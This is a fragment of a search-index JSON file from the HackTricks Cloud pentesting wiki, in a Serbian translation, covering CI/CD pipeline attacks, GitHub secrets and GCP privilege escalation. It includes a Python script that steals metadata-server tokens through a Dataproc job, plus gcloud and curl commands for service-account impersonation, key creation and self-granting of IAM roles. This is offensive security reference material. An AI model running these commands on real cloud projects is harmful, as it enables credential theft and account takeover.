":8,"title":3},"756":{"body":55,"breadcrumbs":7,"title":2},"757":{"body":34,"breadcrumbs":7,"title":2},"758":{"body":142,"breadcrumbs":7,"title":2},"759":{"body":460,"breadcrumbs":8,"title":3},"76":{"body":20,"breadcrumbs":10,"title":4},"760":{"body":219,"breadcrumbs":7,"title":2},"761":{"body":67,"breadcrumbs":6,"title":1},"762":{"body":222,"breadcrumbs":6,"title":1},"763":{"body":25,"breadcrumbs":8,"title":3},"764":{"body":129,"breadcrumbs":8,"title":3},"765":{"body":122,"breadcrumbs":7,"title":2},"766":{"body":225,"breadcrumbs":7,"title":2},"767":{"body":175,"breadcrumbs":10,"title":5},"768":{"body":65,"breadcrumbs":6,"title":1},"769":{"body":57,"breadcrumbs":11,"title":3},"77":{"body":45,"breadcrumbs":10,"title":4},"770":{"body":0,"breadcrumbs":12,"title":4},"771":{"body":348,"breadcrumbs":9,"title":1},"772":{"body":151,"breadcrumbs":9,"title":1},"773":{"body":126,"breadcrumbs":9,"title":4},"774":{"body":0,"breadcrumbs":8,"title":3},"775":{"body":10,"breadcrumbs":6,"title":1},"776":{"body":6,"breadcrumbs":6,"title":1},"777":{"body":47,"breadcrumbs":6,"title":1},"778":{"body":4,"breadcrumbs":6,"title":1},"779":{"body":6,"breadcrumbs":6,"title":1},"78":{"body":62,"breadcrumbs":10,"title":4},"780":{"body":0,"breadcrumbs":8,"title":3},"781":{"body":57,"breadcrumbs":15,"title":5},"782":{"body":10,"breadcrumbs":12,"title":2},"783":{"body":58,"breadcrumbs":14,"title":4},"784":{"body":15,"breadcrumbs":11,"title":1},"785":{"body":26,"breadcrumbs":13,"title":3},"786":{"body":69,"breadcrumbs":13,"title":3},"787":{"body":57,"breadcrumbs":15,"title":5},"788":{"body":11,"breadcrumbs":12,"title":2},"789":{"body":67,"breadcrumbs":11,"title":1},"79":{"body":6,"breadcrumbs":12,"title":6},"790":{"body":57,"breadcrumbs":15,"title":5},"791":{"body":11,"breadcrumbs":12,"title":2},"792":{"body":86,"breadcrumbs":11,"title":1},"793":{"body":57,"breadcrumbs":15,"title":5},"794":{"body":10,"breadcrumbs":12,"title":2},"795":{"body":36,"breadcrumbs":11,"title":1},"796":{"body":286,"breadcrumbs":14,"title":4},"797":{"body":57,"breadcrumbs":15,"title":5},"798":{"body":11,"breadcrumbs":12,"title":2},"799":{"body":43,"breadcrumbs":12,"title":2},"8":{"body":60,"breadcrumbs":5,"title":2},"80":{"body":14,"breadcrumbs":9,"title":3},"800":{"body":88,"breadcrumbs":14,"title":4},"801":{"body":57,"breadcrumbs":15,"title":5},"802":{"body":12,"breadcrumbs":12,"title":2},"803":{"body":153,"breadcrumbs":12,"title":2},"804":{"body":245,"breadcrumbs":14,"title":4},"805":{"body":57,"breadcrumbs":15,"title":5},"806":{"body":11,"breadcrumbs":12,"title":2},"807":{"body":115,"breadcrumbs":12,"title":2},"808":{"body":14,"breadcrumbs":11,"title":1},"809":{"body":20,"breadcrumbs":11,"title":1},"81":{"body":20,"breadcrumbs":12,"title":6},"810":{"body":27,"breadcrumbs":11,"title":1},"811":{"body":53,"breadcrumbs":12,"title":2},"812":{"body":16,"breadcrumbs":11,"title":1},"813":{"body":29,"breadcrumbs":12,"title":2},"814":{"body":23,"breadcrumbs":12,"title":2},"815":{"body":69,"breadcrumbs":11,"title":1},"816":{"body":57,"breadcrumbs":13,"title":4},"817":{"body":11,"breadcrumbs":10,"title":1},"818":{"body":113,"breadcrumbs":13,"title":4},"819":{"body":52,"breadcrumbs":14,"title":5},"82":{"body":60,"breadcrumbs":7,"title":1},"820":{"body":89,"breadcrumbs":13,"title":4},"821":{"body":205,"breadcrumbs":14,"title":5},"822":{"body":57,"breadcrumbs":13,"title":4},"823":{"body":10,"breadcrumbs":10,"title":1},"824":{"body":58,"breadcrumbs":11,"title":2},"825":{"body":74,"breadcrumbs":14,"title":5},"826":{"body":71,"breadcrumbs":11,"title":2},"827":{"body":98,"breadcrumbs":14,"title":5},"828":{"body":57,"breadcrumbs":13,"title":4},"829":{"body":13,"breadcrumbs":10,"title":1},"83":{"body":57,"breadcrumbs":10,"title":5},"830":{"body":161,"breadcrumbs":13,"title":4},"831":{"body":57,"breadcrumbs":13,"title":4},"832":{"body":10,"breadcrumbs":10,"title":1},"833":{"body":133,"breadcrumbs":10,"title":1},"834":{"body":366,"breadcrumbs":11,"title":2},"835":{"body":78,"breadcrumbs":11,"title":2},"836":{"body":82,"breadcrumbs":10,"title":1},"837":{"body":124,"breadcrumbs":10,"title":1},"838":{"body":57,"breadcrumbs":13,"title":4},"839":{"body":17,"breadcrumbs":11,"title":2},"84":{"body":76,"breadcrumbs":7,"title":2},"840":{"body":16,"breadcrumbs":11,"title":2},"841":{"body":22,"breadcrumbs":12,"title":3},"842":{"body":32,"breadcrumbs":12,"title":3},"843":{"body":14,"breadcrumbs":10,"title":1},"844":{"body":15,"breadcrumbs":12,"title":3},"845":{"body":20,"breadcrumbs":10,"title":1},"846":{"body":10,"breadcrumbs":10,"title":1},"847":{"body":13,"breadcrumbs":10,"title":1},"848":{"body":16,"breadcrumbs":10,"title":1},"849":{"body":20,"breadcrumbs":10,"title":1},"85":{"body":0,"breadcrumbs":6,"title":1},"850":{"body":18,"breadcrumbs":10,"title":1},"851":{"body":12,"breadcrumbs":10,"title":1},"852":{"body":10,"breadcrumbs":10,"title":1},"853":{"body":158,"breadcrumbs":10,"title":1},"854":{"body":57,"breadcrumbs":13,"title":4},"855":{"body":17,"breadcrumbs":10,"title":1},"856":{"body":10,"breadcrumbs":10,"title":1},"857":{"body":62,"breadcrumbs":10,"title":1},"858":{"body":29,"breadcrumbs":10,"title":1},"859":{"body":11,"breadcrumbs":10,"title":1},"86":{"body":58,"breadcrumbs":8,"title":3},"860":{"body":33,"breadcrumbs":10,"title":1},"861":{"body":37,"breadcrumbs":10,"title":1},"862":{"body":12,"breadcrumbs":10,"title":1},"863":{"body":88,"breadcrumbs":10,"title":1},"864":{"body":57,"breadcrumbs":13,"title":4},"865":{"body":11,"breadcrumbs":10,"title":1},"866":{"body":26,"breadcrumbs":10,"title":1},"867":{"body":22,"breadcrumbs":10,"title":1},"868":{"body":30,"breadcrumbs":10,"title":1},"869":{"body":31,"breadcrumbs":10,"title":1},"87":{"body":193,"breadcrumbs":8,"title":3},"870":{"body":10,"breadcrumbs":10,"title":1},"871":{"body":63,"breadcrumbs":12,"title":3},"872":{"body":22,"breadcrumbs":10,"title":1},"873":{"body":37,"breadcrumbs":10,"title":1},"874":{"body":12,"breadcrumbs":10,"title":1},"875":{"body":55,"breadcrumbs":11,"title":2},"876":{"body":39,"breadcrumbs":10,"title":1},"877":{"body":12,"breadcrumbs":10,"title":1},"878":{"body":84,"breadcrumbs":11,"title":2},"879":{"body":57,"breadcrumbs":13,"title":4},"88":{"body":75,"breadcrumbs":7,"title":2},"880":{"body":12,"breadcrumbs":10,"title":1},"881":{"body":93,"breadcrumbs":10,"title":1},"882":{"body":57,"breadcrumbs":13,"title":4},"883":{"body":7,"breadcrumbs":10,"title":1},"884":{"body":25,"breadcrumbs":10,"title":1},"885":{"body":26,"breadcrumbs":10,"title":1},"886":{"body":29,"breadcrumbs":10,"title":1},"887":{"body":16,"breadcrumbs":10,"title":1},"888":{"body":69,"breadcrumbs":10,"title":1},"889":{"body":57,"breadcrumbs":13,"title":4},"89":{"body":109,"breadcrumbs":8,"title":3},"890":{"body":5,"breadcrumbs":10,"title":1},"891":{"body":71,"breadcrumbs":11,"title":2},"892":{"body":57,"breadcrumbs":13,"title":4},"893":{"body":12,"breadcrumbs":11,"title":2},"894":{"body":182,"breadcrumbs":12,"title":3},"895":{"body":57,"breadcrumbs":8,"title":3},"896":{"body":297,"breadcrumbs":9,"title":4},"897":{"body":24,"breadcrumbs":9,"title":4},"898":{"body":187,"breadcrumbs":8,"title":3},"899":{"body":90,"breadcrumbs":8,"title":3},"9":{"body":276,"breadcrumbs":6,"title":3},"90":{"body":26,"breadcrumbs":6,"title":1},"900":{"body":24,"breadcrumbs":11,"title":6},"901":{"body":75,"breadcrumbs":6,"title":1},"902":{"body":57,"breadcrumbs":11,"title":3},"903":{"body":86,"breadcrumbs":9,"title":1},"904":{"body":33,"breadcrumbs":13,"title":5},"905":{"body":73,"breadcrumbs":9,"title":1},"906":{"body":36,"breadcrumbs":10,"title":2},"907":{"body":34,"breadcrumbs":10,"title":2},"908":{"body":73,"breadcrumbs":16,"title":8},"909":{"body":57,"breadcrumbs":11,"title":3},"91":{"body":24,"breadcrumbs":6,"title":1},"910":{"body":11,"breadcrumbs":10,"title":2},"911":{"body":116,"breadcrumbs":22,"title":14},"912":{"body":123,"breadcrumbs":11,"title":3},"913":{"body":37,"breadcrumbs":17,"title":9},"914":{"body":32,"breadcrumbs":10,"title":2},"915":{"body":47,"breadcrumbs":10,"title":2},"916":{"body":94,"breadcrumbs":12,"title":4},"917":{"body":107,"breadcrumbs":13,"title":5},"918":{"body":57,"breadcrumbs":13,"title":4},"919":{"body":11,"breadcrumbs":11,"title":2},"92":{"body":14,"breadcrumbs":7,"title":2},"920":{"body":769,"breadcrumbs":10,"title":1},"921":{"body":57,"breadcrumbs":11,"title":3},"922":{"body":5,"breadcrumbs":9,"title":1},"923":{"body":118,"breadcrumbs":10,"title":2},"924":{"body":57,"breadcrumbs":11,"title":3},"925":{"body":9,"breadcrumbs":9,"title":1},"926":{"body":37,"breadcrumbs":10,"title":2},"927":{"body":34,"breadcrumbs":10,"title":2},"928":{"body":76,"breadcrumbs":10,"title":2},"929":{"body":33,"breadcrumbs":9,"title":1},"93":{"body":12,"breadcrumbs":7,"title":2},"930":{"body":45,"breadcrumbs":10,"title":2},"931":{"body":32,"breadcrumbs":9,"title":1},"932":{"body":214,"breadcrumbs":12,"title":4},"933":{"body":57,"breadcrumbs":11,"title":3},"934":{"body":93,"breadcrumbs":12,"title":4},"935":{"body":57,"breadcrumbs":11,"title":3},"936":{"body":11,"breadcrumbs":9,"title":1},"937":{"body":120,"breadcrumbs":10,"title":2},"938":{"body":38,"breadcrumbs":9,"title":1},"939":{"body":33,"breadcrumbs":9,"title":1},"94":{"body":53,"breadcrumbs":7,"title":2},"940":{"body":34,"breadcrumbs":9,"title":1},"941":{"body":74,"breadcrumbs":9,"title":1},"942":{"body":57,"breadcrumbs":11,"title":3},"943":{"body":9,"breadcrumbs":9,"title":1},"944":{"body":54,"breadcrumbs":11,"title":3},"945":{"body":163,"breadcrumbs":11,"title":3},"946":{"body":66,"breadcrumbs":9,"title":1},"947":{"body":13,"breadcrumbs":10,"title":2},"948":{"body":15,"breadcrumbs":9,"title":1},"949":{"body":92,"breadcrumbs":15,"title":7},"95":{"body":26,"breadcrumbs":8,"title":3},"950":{"body":70,"breadcrumbs":15,"title":7},"951":{"body":60,"breadcrumbs":9,"title":1},"952":{"body":57,"breadcrumbs":11,"title":3},"953":{"body":15,"breadcrumbs":9,"title":1},"954":{"body":35,"breadcrumbs":12,"title":4},"955":{"body":108,"breadcrumbs":12,"title":4},"956":{"body":57,"breadcrumbs":13,"title":4},"957":{"body":7,"breadcrumbs":11,"title":2},"958":{"body":171,"breadcrumbs":12,"title":3},"959":{"body":296,"breadcrumbs":12,"title":3},"96":{"body":193,"breadcrumbs":7,"title":2},"960":{"body":60,"breadcrumbs":10,"title":1},"961":{"body":57,"breadcrumbs":11,"title":3},"962":{"body":56,"breadcrumbs":9,"title":1},"963":{"body":120,"breadcrumbs":9,"title":1},"964":{"body":25,"breadcrumbs":9,"title":1},"965":{"body":51,"breadcrumbs":9,"title":1},"966":{"body":51,"breadcrumbs":9,"title":1},"967":{"body":50,"breadcrumbs":9,"title":1},"968":{"body":27,"breadcrumbs":15,"title":7},"969":{"body":161,"breadcrumbs":10,"title":2},"97":{"body":291,"breadcrumbs":7,"title":2},"970":{"body":7,"breadcrumbs":9,"title":1},"971":{"body":7,"breadcrumbs":9,"title":1},"972":{"body":6,"breadcrumbs":9,"title":1},"973":{"body":12,"breadcrumbs":11,"title":3},"974":{"body":6,"breadcrumbs":15,"title":7},"975":{"body":60,"breadcrumbs":9,"title":1},"976":{"body":4,"breadcrumbs":18,"title":5},"977":{"body":53,"breadcrumbs":18,"title":5},"978":{"body":555,"breadcrumbs":15,"title":2},"979":{"body":60,"breadcrumbs":14,"title":1},"98":{"body":38,"breadcrumbs":7,"title":2},"980":{"body":57,"breadcrumbs":11,"title":3},"981":{"body":6,"breadcrumbs":9,"title":1},"982":{"body":45,"breadcrumbs":9,"title":1},"983":{"body":128,"breadcrumbs":9,"title":1},"984":{"body":22,"breadcrumbs":10,"title":2},"985":{"body":77,"breadcrumbs":10,"title":2},"986":{"body":54,"breadcrumbs":12,"title":4},"987":{"body":6,"breadcrumbs":10,"title":2},"988":{"body":59,"breadcrumbs":10,"title":2},"989":{"body":57,"breadcrumbs":11,"title":3},"99":{"body":31,"breadcrumbs":7,"title":2},"990":{"body":0,"breadcrumbs":9,"title":1},"991":{"body":168,"breadcrumbs":9,"title":1},"992":{"body":60,"breadcrumbs":10,"title":2},"993":{"body":62,"breadcrumbs":10,"title":2},"994":{"body":81,"breadcrumbs":26,"title":18},"995":{"body":24,"breadcrumbs":10,"title":2},"996":{"body":39,"breadcrumbs":9,"title":1},"997":{"body":35,"breadcrumbs":9,"title":1},"998":{"body":41,"breadcrumbs":9,"title":1},"999":{"body":81,"breadcrumbs":10,"title":2}},"docs":{"0":{"body":"Reading time: 2 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume. Hacktricks logotipi i animacije dizajnirao @ppiernacho .","breadcrumbs":"HackTricks Cloud » HackTricks Cloud","id":"0","title":"HackTricks Cloud"},"1":{"body":"bash # Download latest version of hacktricks cloud\ngit clone https://github.com/HackTricks-wiki/hacktricks-cloud\n# Run the docker container indicating the path to the hacktricks-cloud folder\ndocker run -d --rm -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c \"cd /app && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0\" Vaša lokalna kopija HackTricks Cloud biće dostupna na http://localhost:3377 nakon minuta.","breadcrumbs":"HackTricks Cloud » Pokrenite HackTricks Cloud lokalno","id":"1","title":"Pokrenite HackTricks Cloud lokalno"},"10":{"body":"Najčešći način da se definiše pipeline je korišćenjem CI konfiguracione datoteke koja se hostuje u repozitorijumu koji pipeline gradi. Ova datoteka opisuje redosled izvršenih poslova, uslove koji utiču na tok i postavke okruženja za izgradnju. Ove datoteke obično imaju dosledno ime i format, na primer — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), i YAML datoteke GitHub Actions smeštene pod .github/workflows. Kada se pokrene, posao pipeline-a povlači kod iz odabranog izvora (npr. commit / grana), i izvršava komande navedene u CI konfiguracionoj datoteci protiv tog koda. Stoga je krajnji cilj napadača da na neki način kompromituje te konfiguracione datoteke ili komande koje izvršavaju .","breadcrumbs":"Pentesting CI/CD Methodology » Pipelines Pentesting Metodologija","id":"10","title":"Pipelines Pentesting Metodologija"},"100":{"body":"Na https://github.com/organizations//settings/actions moguće je proveriti konfiguraciju github akcija za organizaciju. Moguće je potpuno zabraniti korišćenje github akcija, dozvoliti sve github akcije , ili samo dozvoliti određene akcije. Takođe je moguće konfigurisati ko treba da dobije odobrenje za pokretanje Github akcije i dozvole GITHUB_TOKEN Github akcije kada se pokrene.","breadcrumbs":"Github Security » Basic Github Information » Konfiguracija","id":"100","title":"Konfiguracija"},"1000":{"body":"Reading time: 2 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » GCP Dataproc Privilege Escalation","id":"1000","title":"GCP Dataproc Privilege Escalation"},"1001":{"body":"GCP - Dataproc Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » Dataproc","id":"1001","title":"Dataproc"},"1002":{"body":"Nisam mogao da dobijem reverznu školjku koristeći ovu metodu, međutim, moguće je da se iscuri SA token sa metadata endpoint-a koristeći metodu opisanu u nastavku. Koraci za eksploataciju Postavite skriptu posla na GCP Bucket Pošaljite posao na Dataproc klaster. Koristite posao za pristup metadata serveru. Iscurite token servisnog naloga koji koristi klaster. python import requests metadata_url = \"http://metadata/computeMetadata/v1/instance/service-accounts/default/token\"\nheaders = {\"Metadata-Flavor\": \"Google\"} def fetch_metadata_token():\ntry:\nresponse = requests.get(metadata_url, headers=headers, timeout=5)\nresponse.raise_for_status()\ntoken = response.json().get(\"access_token\", \"\")\nprint(f\"Leaked Token: {token}\")\nreturn token\nexcept Exception as e:\nprint(f\"Error fetching metadata token: {e}\")\nreturn None if __name__ == \"__main__\":\nfetch_metadata_token() bash # Copy the script to the storage bucket\ngsutil cp gs:/// # Submit the malicious job\ngcloud dataproc jobs submit pyspark gs:/// \\\n--cluster= \\\n--region= tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get","id":"1002","title":"dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get"},"1003":{"body":"Reading time: 2 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » GCP - Deploymentmaneger Privesc","id":"1003","title":"GCP - Deploymentmaneger Privesc"},"1004":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager","id":"1004","title":"deploymentmanager"},"1005":{"body":"Ova jedina dozvola vam omogućava da pokrenete nove implementacije resursa u GCP sa proizvoljnim servisnim nalozima. Na primer, mogli biste pokrenuti instancu za računanje sa SA da biste se do nje uzdigli. Zapravo možete pokrenuti bilo koji resurs naveden u gcloud deployment-manager types list U originalnom istraživanju korišćen je skript za implementaciju instance za računanje, međutim taj skript neće raditi. Proverite skript za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.create","id":"1005","title":"deploymentmanager.deployments.create"},"1006":{"body":"Ovo je kao prethodna zloupotreba, ali umesto da kreirate novu implementaciju, modifikujete već postojeću (pa budite oprezni) Proverite skript za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.update","id":"1006","title":"deploymentmanager.deployments.update"},"1007":{"body":"Ovo je kao prethodna zloupotreba, ali umesto da direktno kreirate novu implementaciju, prvo vam daje pristup, a zatim zloupotrebljava dozvolu kao što je objašnjeno u prethodnom odeljku deploymentmanager.deployments.create .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.setIamPolicy","id":"1007","title":"deploymentmanager.deployments.setIamPolicy"},"1008":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » References","id":"1008","title":"References"},"1009":{"body":"Reading time: 7 minutes tip Učite i vežbajte AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Podržite HackTricks Proverite planove pretplate ! Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live . Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » GCP - IAM Privesc","id":"1009","title":"GCP - IAM Privesc"},"101":{"body":"Github akcije obično trebaju neku vrstu tajni da bi interagovale sa github-om ili aplikacijama trećih strana. Da bi se izbeglo stavljanje u čistom tekstu u repozitorijum, github omogućava da se one postave kao Tajne . Ove tajne mogu biti konfigurirane za repozitorijum ili za celu organizaciju . Zatim, da bi Akcija mogla da pristupi tajni , potrebno je da je deklarisete kao: yaml steps:\n- name: Hello world action\nwith: # Set the secret as an input\nsuper_secret:${{ secrets.SuperSecret }}\nenv: # Or as an environment variable\nsuper_secret:${{ secrets.SuperSecret }} Primer korišćenja Bash yaml steps:\n- shell: bash\nenv: SUPER_SECRET:${{ secrets.SuperSecret }}\nrun: |\nexample-command \"$SUPER_SECRET\" warning Tajne informacije mogu se pristupiti samo iz Github Actions koje ih imaju deklarisane. Kada su konfigurisane u repozitorijumu ili organizacijama, korisnici Githuba više neće moći da im pristupe , samo će moći da promene . Dakle, jedini način da se ukradu github tajne je da se pristupi mašini koja izvršava Github Action (u toj situaciji ćete moći da pristupite samo tajnama deklarisanim za Action).","breadcrumbs":"Github Security » Basic Github Information » Git tajne","id":"101","title":"Git tajne"},"1010":{"body":"Pronađite više informacija o IAM-u u: GCP - IAM, Principals & Org Policies Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » IAM","id":"1010","title":"IAM"},"1011":{"body":"Napadač sa pomenutim dozvolama će moći da ažurira ulogu dodeljenu vama i da vam dodeli dodatne dozvole za druge resurse kao što su: bash gcloud iam roles update --project --add-permissions Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde i python skriptu za zloupotrebu ovog privilegija ovde . Za više informacija proverite originalno istraživanje .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.roles.update (iam.roles.get)","id":"1011","title":"iam.roles.update (iam.roles.get)"},"1012":{"body":"Napadač sa pomenutim dozvolama će moći da zatraži pristupni token koji pripada Servisnom Nalog , tako da je moguće zatražiti pristupni token Servisnog Naloga sa više privilegija nego što su naše. bash gcloud --impersonate-service-account=\"${victim}@${PROJECT_ID}.iam.gserviceaccount.com\" \\\nauth print-access-token Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde i Python skriptu za zloupotrebu ove privilegije ovde . Za više informacija proverite originalno istraživanje .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)","id":"1012","title":"iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)"},"1013":{"body":"Napadač sa pomenutim dozvolama će moći da kreira ključ koji upravlja korisnikom za Service Account , što će nam omogućiti pristup GCP-u kao taj Service Account. bash gcloud iam service-accounts keys create --iam-account /tmp/key.json gcloud auth activate-service-account --key-file=sa_cred.json Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde i Python skriptu za zloupotrebu ove privilegije ovde . Za više informacija pogledajte originalno istraživanje . Napomena: iam.serviceAccountKeys.update neće raditi za modifikaciju ključa SA jer su za to potrebne i dozvole iam.serviceAccountKeys.create.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccountKeys.create","id":"1013","title":"iam.serviceAccountKeys.create"},"1014":{"body":"Ako imate iam.serviceAccounts.implicitDelegation dozvolu na Servisnom Računu koji ima iam.serviceAccounts.getAccessToken dozvolu na trećem Servisnom Računu, tada možete koristiti implicitDelegation da kreirate token za taj treći Servisni Račun . Evo dijagrama koji pomaže u objašnjenju. Napomena: prema dokumentaciji , delegacija gcloud funkcioniše samo za generisanje tokena koristeći generateAccessToken() metodu. Tako da ovde imate kako da dobijete token koristeći API direktno: bash curl -X POST \\\n'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'\"${TARGET_SERVICE_ACCOUNT}\"':generateAccessToken' \\\n-H 'Content-Type: application/json' \\\n-H 'Authorization: Bearer '\"$(gcloud auth print-access-token)\" \\\n-d '{\n\"delegates\": [\"projects/-/serviceAccounts/'\"${DELEGATED_SERVICE_ACCOUNT}\"'\"],\n\"scope\": [\"https://www.googleapis.com/auth/cloud-platform\"]\n}' Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde i python skriptu za zloupotrebu ove privilegije ovde . Za više informacija pogledajte originalno istraživanje .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.implicitDelegation","id":"1014","title":"iam.serviceAccounts.implicitDelegation"},"1015":{"body":"Napadač sa pomenutim dozvolama će moći da potpiše proizvoljne payload-ove u GCP . Tako će biti moguće napraviti nepodpisani JWT SA i zatim ga poslati kao blob da bi dobili JWT potpisan od SA koji cilјamo. Za više informacija pročitajte ovo . Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde i python skriptu za zloupotrebu ove privilegije ovde i ovde . Za više informacija pogledajte originalno istraživanje .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signBlob","id":"1015","title":"iam.serviceAccounts.signBlob"},"1016":{"body":"Napadač sa pomenutim dozvolama će moći da potpiše dobro oblikovane JSON web tokene (JWT-ove) . Razlika u odnosu na prethodnu metodu je u tome što umesto da nateramo Google da potpiše blob koji sadrži JWT, koristimo metodu signJWT koja već očekuje JWT . Ovo olakšava korišćenje, ali možete potpisivati samo JWT umesto bilo kojih bajtova. Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde i python skriptu za zloupotrebu ove privilegije ovde . Za više informacija pogledajte originalno istraživanje .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signJwt","id":"1016","title":"iam.serviceAccounts.signJwt"},"1017":{"body":"Napadač sa pomenutim dozvolama će moći da doda IAM politike servisnim nalozima . Možete to zloupotrebiti da dodelite sebi dozvole koje su vam potrebne da biste se pretvarali da ste servisni nalog. U sledećem primeru dodeljujemo sebi ulogu roles/iam.serviceAccountTokenCreator nad interesantnim SA: bash gcloud iam service-accounts add-iam-policy-binding \"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" \\\n--member=\"user:username@domain.com\" \\\n--role=\"roles/iam.serviceAccountTokenCreator\" # If you still have prblem grant yourself also this permission\ngcloud iam service-accounts add-iam-policy-binding \"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" \\ \\\n--member=\"user:username@domain.com\" \\\n--role=\"roles/iam.serviceAccountUser\" Možete pronaći skriptu za automatizaciju kreiranja, eksploatacije i čišćenja ranjivog okruženja ovde .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.setIamPolicy","id":"1017","title":"iam.serviceAccounts.setIamPolicy"},"1018":{"body":"iam.serviceAccounts.actAs dozvola je poput iam:PassRole dozvole iz AWS-a . Ključna je za izvršavanje zadataka, kao što je pokretanje Compute Engine instance, jer omogućava \"delovanje kao\" servisni nalog, osiguravajući bezbedno upravljanje dozvolama. Bez ovoga, korisnici bi mogli dobiti neprimeren pristup. Pored toga, eksploatacija iam.serviceAccounts.actAs uključuje različite metode, od kojih svaka zahteva skup dozvola, za razliku od drugih metoda koje trebaju samo jednu. Impersonacija servisnog naloga Impersonacija servisnog naloga može biti veoma korisna za dobijanje novih i boljih privilegija . Postoje tri načina na koja možete impersonirati drugi servisni nalog : Autentifikacija koristeći RSA privatne ključeve (pokazano iznad) Autorizacija koristeći Cloud IAM politike (pokazano ovde) Implementacija poslova na GCP uslugama (više primenljivo na kompromitaciju korisničkog naloga)","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » 